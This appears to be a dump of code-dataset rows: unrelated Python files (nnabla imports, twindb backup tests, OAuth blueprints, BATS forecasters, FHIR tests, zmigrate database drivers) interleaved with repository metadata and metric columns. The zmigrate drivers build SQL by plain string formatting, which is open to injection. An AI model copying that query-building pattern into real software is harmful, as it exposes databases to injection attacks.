| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
9be38005f85b724ee668a6d85efc7fe7470bf5eb
| 229
|
py
|
Python
|
python/src/nnabla/experimental/graph_converters/__init__.py
|
syoyo/nnabla
|
b776b68dcdffe894cac1233dfd07c301415cc0fb
|
[
"Apache-2.0"
] | 1
|
2020-08-03T12:49:19.000Z
|
2020-08-03T12:49:19.000Z
|
python/src/nnabla/experimental/graph_converters/__init__.py
|
langbin2014/nnabla
|
e94bac5bed65337010e2ac07a5937fb862ab2dd8
|
[
"Apache-2.0"
] | 1
|
2020-11-09T07:33:29.000Z
|
2020-11-09T07:33:29.000Z
|
python/src/nnabla/experimental/graph_converters/__init__.py
|
langbin2014/nnabla
|
e94bac5bed65337010e2ac07a5937fb862ab2dd8
|
[
"Apache-2.0"
] | null | null | null |
from .helpers import *
from .batch_normalization_folded import *
from .batch_normalization_linear import *
from .fixed_point_activation import *
from .fixed_point_weight import *
from .identity import *
from .sequential import *
| 28.625
| 41
| 0.816594
| 29
| 229
| 6.172414
| 0.448276
| 0.335196
| 0.167598
| 0.312849
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.122271
| 229
| 7
| 42
| 32.714286
| 0.890547
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
9bf95c2dd4ab726163c4db8c3f7da126ebc35cd4
| 3,167
|
py
|
Python
|
tests/unit/status/mysql_status/test_str.py
|
denssk/backup
|
292d5f1b1a3765ce0ea8d3cab8bd1ae0c583f72e
|
[
"Apache-2.0"
] | 1
|
2019-03-22T00:04:40.000Z
|
2019-03-22T00:04:40.000Z
|
tests/unit/status/mysql_status/test_str.py
|
denssk/backup
|
292d5f1b1a3765ce0ea8d3cab8bd1ae0c583f72e
|
[
"Apache-2.0"
] | 1
|
2021-04-30T20:47:57.000Z
|
2021-04-30T20:47:57.000Z
|
tests/unit/status/mysql_status/test_str.py
|
denssk/backup
|
292d5f1b1a3765ce0ea8d3cab8bd1ae0c583f72e
|
[
"Apache-2.0"
] | 1
|
2019-09-17T08:32:52.000Z
|
2019-09-17T08:32:52.000Z
|
from twindb_backup.status.mysql_status import MySQLStatus
def test_str_old(deprecated_status_raw_content):
status = MySQLStatus(deprecated_status_raw_content)
expected = '{"monthly": {}, "hourly": {"master1/hourly/mysql/mysql-2018-03-28_04_11_16.xbstream.gz": {"galera": false, "binlog": "mysql-bin.000001", "run_type": "hourly", "name": "mysql-2018-03-28_04_11_16.xbstream.gz", "parent": "master1/daily/mysql/mysql-2018-03-28_04_09_53.xbstream.gz", "lsn": 19903207, "type": "incremental", "backup_finished": 1522210295, "wsrep_provider_version": null, "host": "master1", "backup_started": 1522210276, "position": 46855, "config": [{"/etc/my.cnf": "W215c3FsZF0KZGF0YWRpcj0vdmFyL2xpYi9teXNxbApzb2NrZXQ9L3Zhci9saWIvbXlzcWwvbXlzcWwuc29jawp1c2VyPW15c3FsCiMgRGlzYWJsaW5nIHN5bWJvbGljLWxpbmtzIGlzIHJlY29tbWVuZGVkIHRvIHByZXZlbnQgYXNzb3J0ZWQgc2VjdXJpdHkgcmlza3MKc3ltYm9saWMtbGlua3M9MAoKc2VydmVyX2lkPTEwMApndGlkX21vZGU9T04KbG9nLWJpbj1teXNxbC1iaW4KbG9nLXNsYXZlLXVwZGF0ZXMKZW5mb3JjZS1ndGlkLWNvbnNpc3RlbmN5CgpbbXlzcWxkX3NhZmVdCmxvZy1lcnJvcj0vdmFyL2xvZy9teXNxbGQubG9nCnBpZC1maWxlPS92YXIvcnVuL215c3FsZC9teXNxbGQucGlkCg=="}]}}, "yearly": {}, "daily": {"master1/daily/mysql/mysql-2018-03-28_04_09_53.xbstream.gz": {"galera": false, "binlog": "mysql-bin.000001", "run_type": "daily", "name": "mysql-2018-03-28_04_09_53.xbstream.gz", "parent": null, "lsn": 19903199, "type": "full", "backup_finished": 1522210200, "wsrep_provider_version": null, "host": "master1", "backup_started": 1522210193, "position": 46855, "config": [{"/etc/my.cnf": "W215c3FsZF0KZGF0YWRpcj0vdmFyL2xpYi9teXNxbApzb2NrZXQ9L3Zhci9saWIvbXlzcWwvbXlzcWwuc29jawp1c2VyPW15c3FsCiMgRGlzYWJsaW5nIHN5bWJvbGljLWxpbmtzIGlzIHJlY29tbWVuZGVkIHRvIHByZXZlbnQgYXNzb3J0ZWQgc2VjdXJpdHkgcmlza3MKc3ltYm9saWMtbGlua3M9MAoKc2VydmVyX2lkPTEwMApndGlkX21vZGU9T04KbG9nLWJpbj1teXNxbC1iaW4KbG9nLXNsYXZlLXVwZGF0ZXMKZW5mb3JjZS1ndGlkLWNvbnNpc3RlbmN5CgpbbXlzcWxkX3NhZmVdCmxvZy1lcnJvcj0vdmFyL2xvZy9teXNxbGQubG9nCnBpZC1maWxlPS92YXIvcnVuL215c3FsZC9teXNxbGQucGlkCg=="}]}}, "weekly": {}}'
assert str(status) == expected
def test_str_new(status_raw_content):
status = MySQLStatus(status_raw_content)
expected = '{"monthly": {}, "hourly": {"master1/hourly/mysql/mysql-2018-03-28_04_11_16.xbstream.gz": {"galera": false, "binlog": "mysql-bin.000001", "run_type": "hourly", "name": "mysql-2018-03-28_04_11_16.xbstream.gz", "parent": "master1/daily/mysql/mysql-2018-03-28_04_09_53.xbstream.gz", "lsn": 19903207, "type": "incremental", "backup_finished": 1522210295, "wsrep_provider_version": null, "host": "master1", "backup_started": 1522210276, "position": 46855, "config": [{"/etc/my.cnf": "W215c3FsZF0KZGF0YWRpcj0vdmFyL2xpYi9teXNxbApzb2NrZXQ9L3Zhci9saWIvbXlzcWwvbXlzcWwuc29jawp1c2VyPW15c3FsCiMgRGlzYWJsaW5nIHN5bWJvbGljLWxpbmtzIGlzIHJlY29tbWVuZGVkIHRvIHByZXZlbnQgYXNzb3J0ZWQgc2VjdXJpdHkgcmlza3MKc3ltYm9saWMtbGlua3M9MAoKc2VydmVyX2lkPTEwMApndGlkX21vZGU9T04KbG9nLWJpbj1teXNxbC1iaW4KbG9nLXNsYXZlLXVwZGF0ZXMKZW5mb3JjZS1ndGlkLWNvbnNpc3RlbmN5CgpbbXlzcWxkX3NhZmVdCmxvZy1lcnJvcj0vdmFyL2xvZy9teXNxbGQubG9nCnBpZC1maWxlPS92YXIvcnVuL215c3FsZC9teXNxbGQucGlkCg=="}]}}, "yearly": {}, "daily": {}, "weekly": {}}'
assert str(status) == expected
| 197.9375
| 1,845
| 0.825703
| 244
| 3,167
| 10.491803
| 0.266393
| 0.028125
| 0.034375
| 0.040625
| 0.935938
| 0.8875
| 0.885938
| 0.698047
| 0.679297
| 0.667969
| 0
| 0.142525
| 0.049574
| 3,167
| 15
| 1,846
| 211.133333
| 0.707973
| 0
| 0
| 0.222222
| 0
| 0.222222
| 0.886959
| 0.596464
| 0
| 0
| 0
| 0
| 0.222222
| 1
| 0.222222
| false
| 0
| 0.111111
| 0
| 0.333333
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
5002522ee09d8aeb626f11de5b128ddd46a2e9a6
| 150
|
py
|
Python
|
app/oauth/__init__.py
|
liam-carswell/flask-dance-multi-provider
|
86e66154ea83963d6b729c0cc5b8a45ba2555ee8
|
[
"MIT"
] | null | null | null |
app/oauth/__init__.py
|
liam-carswell/flask-dance-multi-provider
|
86e66154ea83963d6b729c0cc5b8a45ba2555ee8
|
[
"MIT"
] | null | null | null |
app/oauth/__init__.py
|
liam-carswell/flask-dance-multi-provider
|
86e66154ea83963d6b729c0cc5b8a45ba2555ee8
|
[
"MIT"
] | null | null | null |
from .github import blueprint as github_blueprint
from .google import blueprint as google_blueprint
from .strava import blueprint as strava_blueprint
| 37.5
| 49
| 0.86
| 21
| 150
| 6
| 0.333333
| 0.357143
| 0.404762
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12
| 150
| 3
| 50
| 50
| 0.954545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 8
|
5045dd518db41d227f64eeee9e15bd9bb294d8cd
| 3,398
|
py
|
Python
|
timemachines/skaters/bats/allbatsskaters.py
|
iklasky/timemachines
|
1820fa9453d31d4daaeff75274a935c7455febe3
|
[
"MIT"
] | 253
|
2021-01-08T17:33:30.000Z
|
2022-03-21T17:32:36.000Z
|
timemachines/skaters/bats/allbatsskaters.py
|
iklasky/timemachines
|
1820fa9453d31d4daaeff75274a935c7455febe3
|
[
"MIT"
] | 65
|
2021-01-20T16:43:35.000Z
|
2022-03-30T19:07:22.000Z
|
timemachines/skaters/bats/allbatsskaters.py
|
iklasky/timemachines
|
1820fa9453d31d4daaeff75274a935c7455febe3
|
[
"MIT"
] | 28
|
2021-02-04T14:58:30.000Z
|
2022-01-17T04:35:17.000Z
|
from timemachines.skatertools.utilities.conventions import Y_TYPE, A_TYPE, R_TYPE, E_TYPE, T_TYPE
from timemachines.skaters.bats.batsinclusion import using_bats
if using_bats:
from timemachines.skaters.bats.batsfactory import bats_factory
def bats_fast(y: Y_TYPE, s, k: int, a: A_TYPE = None, t: T_TYPE = None, e: E_TYPE = None, r: R_TYPE = None):
return bats_factory(y=y, s=s, k=k, a=a, t=t, e=e, use_trend=False, use_arma_errors=False, use_box_cox=False)
def bats_trendy(y :Y_TYPE, s, k:int, a:A_TYPE =None, t:T_TYPE =None, e:E_TYPE =None, r:R_TYPE=None):
return bats_factory(y=y, s=s, k=k, a=a, t=t, e=e, use_trend=True, use_arma_errors=False, use_box_cox=False)
def bats_damped(y: Y_TYPE, s, k: int, a: A_TYPE = None, t: T_TYPE = None, e: E_TYPE = None, r: R_TYPE = None):
return bats_factory(y=y, s=s, k=k, a=a, t=t, e=e, use_damped_trend=True, use_arma_errors=False, use_box_cox=False)
def bats_arma(y: Y_TYPE, s, k: int, a: A_TYPE = None, t: T_TYPE = None, e: E_TYPE = None, r: R_TYPE = None):
return bats_factory(y=y, s=s, k=k, a=a, t=t, e=e, use_trend=False, use_arma_errors=True, use_box_cox=False)
def bats_arma_bc(y: Y_TYPE, s, k: int, a: A_TYPE = None, t: T_TYPE = None, e: E_TYPE = None, r: R_TYPE = None):
return bats_factory(y=y, s=s, k=k, a=a, t=t, e=e, use_trend=False, use_arma_errors=True, use_box_cox=True)
def bats_damped_arma(y: Y_TYPE, s, k: int, a: A_TYPE = None, t: T_TYPE = None, e: E_TYPE = None, r: R_TYPE = None):
return bats_factory(y=y, s=s, k=k, a=a, t=t, e=e, use_damped_trend=True, use_arma_errors=True, use_box_cox=False)
def bats_trendy_arma(y: Y_TYPE, s, k: int, a: A_TYPE = None, t: T_TYPE = None, e: E_TYPE = None, r: R_TYPE = None):
return bats_factory(y=y, s=s, k=k, a=a, t=t, e=e, use_trend=True, use_arma_errors=True, use_box_cox=False)
def bats_bc(y: Y_TYPE, s, k: int, a: A_TYPE = None, t: T_TYPE = None, e: E_TYPE = None, r: R_TYPE = None):
return bats_factory(y=y, s=s, k=k, a=a, t=t, e=e, use_trend=False, use_arma_errors=False, use_box_cox=True)
def bats_trendy_bc(y: Y_TYPE, s, k: int, a: A_TYPE = None, t: T_TYPE = None, e: E_TYPE = None, r: R_TYPE = None):
return bats_factory(y=y, s=s, k=k, a=a, t=t, e=e, use_trend=True, use_arma_errors=False,
use_box_cox=True)
def bats_damped_bc(y: Y_TYPE, s, k: int, a: A_TYPE = None, t: T_TYPE = None, e: E_TYPE = None, r: R_TYPE = None):
return bats_factory(y=y, s=s, k=k, a=a, t=t, e=e, use_damped_trend=True, use_arma_errors=False,
use_box_cox=True)
def bats_damped_arma_bc(y: Y_TYPE, s, k: int, a: A_TYPE = None, t: T_TYPE = None, e: E_TYPE = None, r: R_TYPE = None):
return bats_factory(y=y, s=s, k=k, a=a, t=t, e=e, use_damped_trend=True, use_arma_errors=True, use_box_cox=True)
def bats_trendy_arma_bc(y: Y_TYPE, s, k: int, a: A_TYPE = None, t: T_TYPE = None, e: E_TYPE = None, r: R_TYPE = None):
return bats_factory(y=y, s=s, k=k, a=a, t=t, e=e, use_trend=True, use_arma_errors=True, use_box_cox=True)
BATS_SKATERS = [bats_fast, bats_arma, bats_bc, bats_arma_bc,
bats_trendy, bats_trendy_arma, bats_trendy_bc, bats_trendy_arma_bc,
bats_damped, bats_damped_arma, bats_damped_bc, bats_damped_arma_bc]
else:
BATS_SKATERS = []
| 57.59322
| 122
| 0.654797
| 698
| 3,398
| 2.918338
| 0.054441
| 0.188513
| 0.035346
| 0.041237
| 0.814433
| 0.814433
| 0.814433
| 0.802651
| 0.799705
| 0.799705
| 0
| 0
| 0.201589
| 3,398
| 59
| 123
| 57.59322
| 0.750829
| 0
| 0
| 0.057143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.342857
| false
| 0
| 0.085714
| 0.342857
| 0.771429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 9
|
5060eafbe4df6ee666240bdb01706082c4b9d3e0
| 167
|
py
|
Python
|
app/listeners/__init__.py
|
LuoLuo0101/cognition-stock
|
62201106fbb50635ca731921c159a700bc36ebb4
|
[
"MIT"
] | null | null | null |
app/listeners/__init__.py
|
LuoLuo0101/cognition-stock
|
62201106fbb50635ca731921c159a700bc36ebb4
|
[
"MIT"
] | null | null | null |
app/listeners/__init__.py
|
LuoLuo0101/cognition-stock
|
62201106fbb50635ca731921c159a700bc36ebb4
|
[
"MIT"
] | null | null | null |
from sanic import Sanic
from app.listeners.redis_listeners import configure_redis_listeners
def configure_listeners(app: Sanic):
configure_redis_listeners(app)
| 20.875
| 67
| 0.838323
| 22
| 167
| 6.090909
| 0.363636
| 0.313433
| 0.343284
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.113772
| 167
| 7
| 68
| 23.857143
| 0.905405
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ac95e1c12984d21e7043e2f9d40e404e892a0a65
| 12,059
|
py
|
Python
|
fhir/resources/STU3/tests/test_messagedefinition.py
|
mmabey/fhir.resources
|
cc73718e9762c04726cd7de240c8f2dd5313cbe1
|
[
"BSD-3-Clause"
] | null | null | null |
fhir/resources/STU3/tests/test_messagedefinition.py
|
mmabey/fhir.resources
|
cc73718e9762c04726cd7de240c8f2dd5313cbe1
|
[
"BSD-3-Clause"
] | null | null | null |
fhir/resources/STU3/tests/test_messagedefinition.py
|
mmabey/fhir.resources
|
cc73718e9762c04726cd7de240c8f2dd5313cbe1
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Profile: http://hl7.org/fhir/StructureDefinition/MessageDefinition
Release: STU3
Version: 3.0.2
Revision: 11917
Last updated: 2019-10-24T11:53:00+11:00
"""
import io
import json
import os
import unittest
import pytest
from .. import messagedefinition
from ..fhirdate import FHIRDate
from .fixtures import force_bytes
@pytest.mark.usefixtures("base_settings")
class MessageDefinitionTests(unittest.TestCase):
def instantiate_from(self, filename):
datadir = os.environ.get("FHIR_UNITTEST_DATADIR") or ""
with io.open(os.path.join(datadir, filename), "r", encoding="utf-8") as handle:
js = json.load(handle)
self.assertEqual("MessageDefinition", js["resourceType"])
return messagedefinition.MessageDefinition(js)
def testMessageDefinition1(self):
inst = self.instantiate_from("messagedefinition-example.json")
self.assertIsNotNone(
inst, "Must have instantiated a MessageDefinition instance"
)
self.implMessageDefinition1(inst)
js = inst.as_json()
self.assertEqual("MessageDefinition", js["resourceType"])
inst2 = messagedefinition.MessageDefinition(js)
self.implMessageDefinition1(inst2)
def implMessageDefinition1(self, inst):
self.assertEqual(force_bytes(inst.category), force_bytes("Notification"))
self.assertEqual(
force_bytes(inst.contact[0].telecom[0].system), force_bytes("url")
)
self.assertEqual(
force_bytes(inst.contact[0].telecom[0].value), force_bytes("http://hl7.org")
)
self.assertEqual(inst.date.date, FHIRDate("2016-11-09").date)
self.assertEqual(inst.date.as_json(), "2016-11-09")
self.assertEqual(
force_bytes(inst.event.code), force_bytes("communication-request")
)
self.assertEqual(
force_bytes(inst.event.system),
force_bytes("http://hl7.org/fhir/message-events"),
)
self.assertTrue(inst.experimental)
self.assertEqual(force_bytes(inst.id), force_bytes("example"))
self.assertEqual(force_bytes(inst.name), force_bytes("EXAMPLE"))
self.assertEqual(
force_bytes(inst.publisher), force_bytes("Health Level Seven, Int'l")
)
self.assertEqual(
force_bytes(inst.purpose),
force_bytes("Defines a base example for other MessageDefintion instances."),
)
self.assertFalse(inst.responseRequired)
self.assertEqual(force_bytes(inst.status), force_bytes("draft"))
self.assertEqual(
force_bytes(inst.text.div),
force_bytes(
'<div xmlns="http://www.w3.org/1999/xhtml">Message definition base example</div>'
),
)
self.assertEqual(force_bytes(inst.text.status), force_bytes("generated"))
self.assertEqual(
force_bytes(inst.title), force_bytes("Message definition base example")
)
self.assertEqual(
force_bytes(inst.url),
force_bytes("http://hl7.org/fhir/MessageDefinition/example"),
)
def testMessageDefinition2(self):
inst = self.instantiate_from("messagedefinition-patient-link-notification.json")
self.assertIsNotNone(
inst, "Must have instantiated a MessageDefinition instance"
)
self.implMessageDefinition2(inst)
js = inst.as_json()
self.assertEqual("MessageDefinition", js["resourceType"])
inst2 = messagedefinition.MessageDefinition(js)
self.implMessageDefinition2(inst2)
def implMessageDefinition2(self, inst):
self.assertEqual(
force_bytes(inst.allowedResponse[0].situation),
force_bytes(
"Optional response message that may provide additional information"
),
)
self.assertEqual(force_bytes(inst.category), force_bytes("Notification"))
self.assertEqual(
force_bytes(inst.contact[0].telecom[0].system), force_bytes("url")
)
self.assertEqual(
force_bytes(inst.contact[0].telecom[0].value), force_bytes("http://hl7.org")
)
self.assertEqual(force_bytes(inst.copyright), force_bytes("� HL7.org 2011+"))
self.assertEqual(inst.date.date, FHIRDate("2017-02-03").date)
self.assertEqual(inst.date.as_json(), "2017-02-03")
self.assertEqual(
force_bytes(inst.description),
force_bytes(
"Notification of two patient records that represent the same individual that require an established linkage."
),
)
self.assertEqual(force_bytes(inst.event.code), force_bytes("patient-link"))
self.assertEqual(
force_bytes(inst.event.system),
force_bytes("http://hl7.org/fhir/message-events"),
)
self.assertTrue(inst.experimental)
self.assertEqual(force_bytes(inst.focus[0].code), force_bytes("Patient"))
self.assertEqual(force_bytes(inst.focus[0].max), force_bytes("2"))
self.assertEqual(inst.focus[0].min, 2)
self.assertEqual(force_bytes(inst.id), force_bytes("patient-link-notification"))
self.assertEqual(
force_bytes(inst.identifier.system), force_bytes("urn:ietf:rfc:3986")
)
self.assertEqual(
force_bytes(inst.identifier.value),
force_bytes("urn:oid:1.3.6.1.4.1.21367.2005.3.7.9878"),
)
self.assertEqual(
force_bytes(inst.jurisdiction[0].coding[0].code), force_bytes("US")
)
self.assertEqual(
force_bytes(inst.jurisdiction[0].coding[0].display),
force_bytes("United States of America (the)"),
)
self.assertEqual(
force_bytes(inst.jurisdiction[0].coding[0].system),
force_bytes("urn:iso:std:iso:3166"),
)
self.assertEqual(
force_bytes(inst.name), force_bytes("PATIENT-LINK-NOTIFICATION")
)
self.assertEqual(
force_bytes(inst.publisher), force_bytes("Health Level Seven, Int'l")
)
self.assertEqual(
force_bytes(inst.purpose),
force_bytes(
"Notifies recipient systems that two patients have been 'linked' - meaning they represent the same individual"
),
)
self.assertFalse(inst.responseRequired)
self.assertEqual(force_bytes(inst.status), force_bytes("draft"))
self.assertEqual(
force_bytes(inst.text.div),
force_bytes(
'<div xmlns="http://www.w3.org/1999/xhtml">Link Patients Notification</div>'
),
)
self.assertEqual(force_bytes(inst.text.status), force_bytes("generated"))
self.assertEqual(
force_bytes(inst.title), force_bytes("Link Patients Notification")
)
self.assertEqual(
force_bytes(inst.url),
force_bytes(
"http://hl7.org/fhir/MessageDefinition/patient-link-notification"
),
)
self.assertEqual(
force_bytes(inst.useContext[0].code.code), force_bytes("focus")
)
self.assertEqual(
force_bytes(inst.useContext[0].code.system),
force_bytes("http://hl7.org/fhir/usage-context-type"),
)
self.assertEqual(
force_bytes(inst.useContext[0].valueCodeableConcept.coding[0].code),
force_bytes("positive"),
)
self.assertEqual(
force_bytes(inst.useContext[0].valueCodeableConcept.coding[0].system),
force_bytes("http://hl7.org/fhir/variant-state"),
)
self.assertEqual(force_bytes(inst.version), force_bytes("1"))
def testMessageDefinition3(self):
inst = self.instantiate_from("messagedefinition-patient-link-response.json")
self.assertIsNotNone(
inst, "Must have instantiated a MessageDefinition instance"
)
self.implMessageDefinition3(inst)
js = inst.as_json()
self.assertEqual("MessageDefinition", js["resourceType"])
inst2 = messagedefinition.MessageDefinition(js)
self.implMessageDefinition3(inst2)
def implMessageDefinition3(self, inst):
self.assertEqual(force_bytes(inst.category), force_bytes("Consequence"))
self.assertEqual(
force_bytes(inst.contact[0].telecom[0].system), force_bytes("url")
)
self.assertEqual(
force_bytes(inst.contact[0].telecom[0].value), force_bytes("http://hl7.org")
)
self.assertEqual(force_bytes(inst.copyright), force_bytes("� HL7.org 2011+"))
self.assertEqual(inst.date.date, FHIRDate("2017-02-03").date)
self.assertEqual(inst.date.as_json(), "2017-02-03")
self.assertEqual(
force_bytes(inst.description),
force_bytes("Optional response to a patient link notification."),
)
self.assertEqual(force_bytes(inst.event.code), force_bytes("patient-link"))
self.assertEqual(
force_bytes(inst.event.system),
force_bytes("http://hl7.org/fhir/message-events"),
)
self.assertTrue(inst.experimental)
self.assertEqual(force_bytes(inst.focus[0].code), force_bytes("Patient"))
self.assertEqual(force_bytes(inst.focus[0].max), force_bytes("2"))
self.assertEqual(inst.focus[0].min, 2)
self.assertEqual(force_bytes(inst.id), force_bytes("patient-link-response"))
self.assertEqual(
force_bytes(inst.identifier.system), force_bytes("urn:ietf:rfc:3986")
)
self.assertEqual(
force_bytes(inst.identifier.value),
force_bytes("urn:oid:1.3.6.1.4.1.21367.2005.3.7.9879"),
)
self.assertEqual(
force_bytes(inst.jurisdiction[0].coding[0].code), force_bytes("US")
)
self.assertEqual(
force_bytes(inst.jurisdiction[0].coding[0].display),
force_bytes("United States of America (the)"),
)
self.assertEqual(
force_bytes(inst.jurisdiction[0].coding[0].system),
force_bytes("urn:iso:std:iso:3166"),
)
self.assertEqual(force_bytes(inst.name), force_bytes("PATIENT-LINK-RESPONSE"))
self.assertEqual(
force_bytes(inst.publisher), force_bytes("Health Level Seven, Int'l")
)
self.assertEqual(
force_bytes(inst.purpose),
force_bytes(
"Optional response message that may provide additional information on the outcome of the patient link operation."
),
)
self.assertFalse(inst.responseRequired)
self.assertEqual(force_bytes(inst.status), force_bytes("draft"))
self.assertEqual(
force_bytes(inst.text.div),
force_bytes(
'<div xmlns="http://www.w3.org/1999/xhtml">Link Patients Response</div>'
),
)
self.assertEqual(force_bytes(inst.text.status), force_bytes("generated"))
self.assertEqual(force_bytes(inst.title), force_bytes("Link Patients Response"))
self.assertEqual(
force_bytes(inst.url),
force_bytes("http://hl7.org/fhir/MessageDefinition/patient-link-response"),
)
self.assertEqual(
force_bytes(inst.useContext[0].code.code), force_bytes("focus")
)
self.assertEqual(
force_bytes(inst.useContext[0].code.system),
force_bytes("http://hl7.org/fhir/usage-context-type"),
)
self.assertEqual(
force_bytes(inst.useContext[0].valueCodeableConcept.coding[0].code),
force_bytes("positive"),
)
self.assertEqual(
force_bytes(inst.useContext[0].valueCodeableConcept.coding[0].system),
force_bytes("http://hl7.org/fhir/variant-state"),
)
self.assertEqual(force_bytes(inst.version), force_bytes("1"))
| 41.297945
| 129
| 0.627001
| 1,309
| 12,059
| 5.658518
| 0.154316
| 0.193061
| 0.191711
| 0.239638
| 0.8253
| 0.81909
| 0.806804
| 0.797354
| 0.767382
| 0.760902
| 0.000166
| 0.026562
| 0.247616
| 12,059
| 291
| 130
| 41.439863
| 0.789596
| 0.014429
| 0
| 0.60223
| 0
| 0.018587
| 0.197693
| 0.028122
| 0
| 0
| 0
| 0
| 0.342007
| 1
| 0.026022
| false
| 0
| 0.02974
| 0
| 0.063197
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
acb6dc5e93b58f39fd88535f2e0328cc4a243990
| 3,968
|
py
|
Python
|
zmigrate/drivers.py
|
ziggurattech/zmigrate
|
6dc2d1bc907db165869457300021840fe4c6d069
|
[
"MIT"
] | null | null | null |
zmigrate/drivers.py
|
ziggurattech/zmigrate
|
6dc2d1bc907db165869457300021840fe4c6d069
|
[
"MIT"
] | null | null | null |
zmigrate/drivers.py
|
ziggurattech/zmigrate
|
6dc2d1bc907db165869457300021840fe4c6d069
|
[
"MIT"
] | null | null | null |
from zmigrate.utils import no_impl
class Driver:
pass
class Postgres(Driver):
def __init__(self, args):
import psycopg2
self.conn = psycopg2.connect(host=args.host, user=args.user, password=args.password)
self.conn.set_session(autocommit=True)
rows = self.execute("SELECT 1 FROM pg_catalog.pg_database WHERE datname = '%s'" % args.database, readRows=True)
if not len(rows):
self.create_database(args.database)
self.conn.close()
self.conn = psycopg2.connect(host=args.host, user=args.user, password=args.password, database=args.database)
def __del__(self):
self.conn.close()
def execute(self, statements, readRows=False):
resp = []
if not len(statements.strip()):
return resp
cur = self.conn.cursor()
cur.execute(statements)
self.conn.commit()
while readRows:
row = cur.fetchone()
if row is None:
break
resp.append(row)
cur.close()
return resp
def execute_script(self, statements, readRows=False):
return self.execute(statements, readRows)
def create_database(self, database_name):
self.execute('CREATE DATABASE %s' % database_name)
def create_table(self, table_name, columns):
self.execute('CREATE TABLE IF NOT EXISTS %s (%s)' % (table_name, ', '.join(['%s %s %s' % (x.get('name'), x.get('type'), x.get('constraints', '')) for x in columns])))
def insert_row(self, table_name, **args):
columns = ', '.join([x for x in args])
values = ', '.join([args[x] for x in args])
self.execute("INSERT INTO %s (%s) VALUES (%s)" % (table_name, columns, values))
def delete_row(self, table_name, constraints):
if constraints:
self.execute("DELETE FROM %s WHERE %s" % (table_name, constraints))
else:
self.execute("DELETE FROM %s" % (table_name))
def get_rows(self, table_name, columns, limit=0, **constraints):
stmt = "SELECT " + ', '.join(columns) + " FROM %s" % table_name
if len(constraints) > 0:
stmt += " WHERE %s" % ' AND '.join(['%s = %s' % (x, constraints[x]) for x in constraints])
if limit > 0:
stmt += " LIMIT %d" % limit
return self.execute(stmt, readRows=True)
class SQLite3(Driver):
def __init__(self, args):
import sqlite3
self.conn = sqlite3.connect(args.database)
def __del__(self):
self.conn.close()
def execute(self, statements, readRows=False):
resp = []
if not len(statements.strip()):
return resp
cur = self.conn.cursor()
cur.execute(statements)
self.conn.commit()
while readRows:
row = cur.fetchone()
if row is None:
break
resp.append(row)
cur.close()
return resp
def execute_script(self, statements, readRows=False):
resp = []
if not len(statements.strip()):
return resp
cur = self.conn.cursor()
cur.executescript(statements)
self.conn.commit()
while readRows:
row = cur.fetchone()
if row is None:
break
resp.append(row)
cur.close()
return resp
def create_database(self, database_name):
self.execute('CREATE DATABASE %s' % database_name)
def create_table(self, table_name, columns):
self.execute('CREATE TABLE IF NOT EXISTS %s (%s)' % (table_name, ', '.join(['%s %s %s' % (x.get('name'), x.get('type'), x.get('constraints', '')) for x in columns])))
def insert_row(self, table_name, **args):
columns = ', '.join([x for x in args])
values = ', '.join([args[x] for x in args])
self.execute("INSERT INTO %s (%s) VALUES (%s)" % (table_name, columns, values))
def delete_row(self, table_name, constraints):
if constraints:
self.execute("DELETE FROM %s WHERE %s" % (table_name, constraints))
else:
self.execute("DELETE FROM %s" % (table_name))
def get_rows(self, table_name, columns, limit=0, **constraints):
stmt = "SELECT " + ', '.join(columns) + " FROM %s" % table_name
if len(constraints) > 0:
